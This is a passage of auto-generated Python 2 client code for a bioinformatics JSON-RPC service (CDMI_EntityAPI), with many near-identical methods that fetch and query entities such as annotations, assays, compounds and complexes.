body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Annotation(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Annotation',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Annotation(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Annotation',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Annotation(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Annotation',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Assay(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Assay',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Assay(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Assay',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Assay(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Assay',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Association(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Association',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Association(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Association',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Association(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Association',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AssociationDataset(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AssociationDataset',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AssociationDataset(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AssociationDataset',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AssociationDataset(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AssociationDataset',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AssociationDetectionType(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AssociationDetectionType',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AssociationDetectionType(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AssociationDetectionType',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AssociationDetectionType(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AssociationDetectionType',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AtomicRegulon(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AtomicRegulon',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AtomicRegulon(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AtomicRegulon',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AtomicRegulon(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AtomicRegulon',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Attribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Attribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Attribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Attribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Attribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Attribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Biomass(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Biomass',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Biomass(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Biomass',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Biomass(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Biomass',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_CodonUsage(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_CodonUsage',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_CodonUsage(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_CodonUsage',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_CodonUsage(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_CodonUsage',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Complex(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Complex',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Complex(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Complex',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Complex(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Complex',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Compound(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Compound',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Compound(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Compound',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Compound(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Compound',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_CompoundInstance(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_CompoundInstance',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_CompoundInstance(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_CompoundInstance',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
